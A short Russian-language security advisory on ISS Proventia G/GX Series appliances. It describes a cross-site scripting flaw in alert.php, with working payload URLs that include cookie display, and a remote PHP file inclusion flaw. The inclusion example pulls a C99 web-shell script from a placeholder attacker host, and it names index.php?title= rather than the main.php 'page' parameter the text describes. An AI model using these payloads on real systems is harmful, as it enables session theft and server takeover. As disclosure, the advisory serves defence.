Программа: ISS Proventia G/GX Series

Уязвимость позволяет удаленному пользователю выполнить PHP сценарий и произвести XSS нападение на целевую систему.

1) Уязвимость существует из-за недостаточной обработки входных данных в параметре «reminder» сценарием alert.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

Требуется аутентификация!

https://10.0.0.100/alert.php?reminder=—>//"><script>alert(/XSS%20vulnerability%20proventia%20s0x by Alex Hernandez/);</script>

https://10.0.0.100/alert.php?reminder=—>//"><script>alert(document.cookie)</script>

https://10.0.0.100/alert.php?reminder=—>//"><script>alert(document.domain)</script>

2) Уязвимость существует из-за недостаточной обработки входных данных в параметре «page» сценарием main.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

www.vulnerable.website.com/index.php?title= http://www.malicious.code.com/C99.php?archive.php



Оставить мнение